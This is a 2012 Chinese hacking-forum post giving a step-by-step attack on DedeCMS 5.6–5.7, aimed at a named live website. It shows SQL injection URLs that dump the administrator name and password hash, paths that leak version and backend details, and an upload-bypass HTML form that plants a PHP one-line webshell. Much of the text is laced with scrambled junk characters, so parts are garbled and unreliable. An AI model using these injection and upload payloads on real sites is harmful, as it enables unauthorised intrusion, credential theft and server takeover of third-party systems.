找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2688|回复: 0
打印 上一主题 下一主题

dedecms5.6-5.7注入与上传漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 10:56:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
①注入漏洞。
" G+ {) e/ [" S4 r这站 http://www.political-security.com/
. ~- C9 S; B  d  x! q3 h1 {2 u首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,; A$ l9 x; d9 W$ o
www.political-security.com/data/mysql_error_trace.inc 爆后台- n" E, q5 A, [# p8 g# U1 Y1 G
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。) E& E3 f! r# P7 A7 b& C1 r9 `4 K
然后写上语句 ! t# ?/ d/ ~0 P& R- @4 w
查看管理员帐号
# v5 {) _- d# y9 dhttp://www.political-security.co ... &membergroup=@`
) J! c9 z. D; G2 A  ~) o4 V( I! X1 V# A$ z& C9 z
admin + y( T) ^) S* c6 R' d5 G: k
% M: k& N% v8 t" n" w8 f; I7 H# _8 t) u
查看管理员密码# K- q( \8 t& L4 }; n" T
 http://www.political-security.co ... &membergroup=@`
' {" Q3 |0 ]: x2 P
7 t( }( ?! O6 e2 O1 i# e9 g: I' y8d29b1ef9f8c5a5af429
: G. Q+ u* c) j* @0 T9 K) _4 H0 {4 H& ]7 {( q( x
查看管理员密码6 q# n: X/ }" n- `' B2 N
8 K+ K! O4 W7 ]. X, J/ p
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
/ v* D& n/ p' T' F  a) M1 V# k7 l3 p/ W- d/ T2 V
8d2$ S6 \$ Q2 t, `' v8 g
9b1ef9f8c5a5af42' S8 G' ^- W& }( W+ O
9
9 W% W3 p) {' T9 Z% b- q; d+ [6 t, z8 a- u
cmd5没解出来 只好测试第二个方法$ p# h% d5 j9 l2 E' A0 h, r5 X

% p: [+ E# _9 L( c) s/ D1 U% e6 v" k
②上传漏洞:
! R7 w0 P; u$ e8 U
3 _7 A( s- |+ q* t2 C% Y) O只要登陆会员中心,然后访问页面链接; p- m; p" T/ z7 g' Q% G
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
- E! E  [& ], ?. ^0 b9 P# g. M
2 a# y. F+ ?" Q5 Q2 B如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”/ ?: I7 S1 A* l  a- |; e5 x) ~
% r* Q* f0 @' J$ h2 f
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm- G# o! |/ a' h. \) y8 V
* |5 m- m3 D1 E' x: e# v
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>; S$ k3 E( A$ I6 U# [5 U
或者
5 `* p: i4 }( w8 l即可上传成功
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表